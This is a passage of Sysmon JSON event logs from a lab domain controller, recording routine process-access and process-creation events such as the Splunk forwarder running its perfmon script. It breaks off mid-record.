{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2202,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2203,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.016\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010C1630300}\r\nTargetProcessId: 3752\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.016","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010C1630300}","TargetProcessId":"3752","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2204,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.127\r\nProcessGuid: {A837DB8D-01CB-5F25-0000-0010E9030400}\r\nProcessId: 3868\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\perfmon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.127","ProcessGuid":"{A837DB8D-01CB-5F25-0000-0010E9030400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\perfmon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2205,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.125\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01CB-5F25-0000-0010E9030400}\r\nTargetProcessId: 3868\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.125","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"3772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01CB-5F25-0000-0010E9030400}","TargetProcessId":"3868","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2206,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.125\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01CB-5F25-0000-0010E9030400}\r\nTargetProcessId: 3868\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.125","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01CB-5F25-0000-0010E9030400}","TargetProcessId":"3868","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2207,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2208,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2209,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2210,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 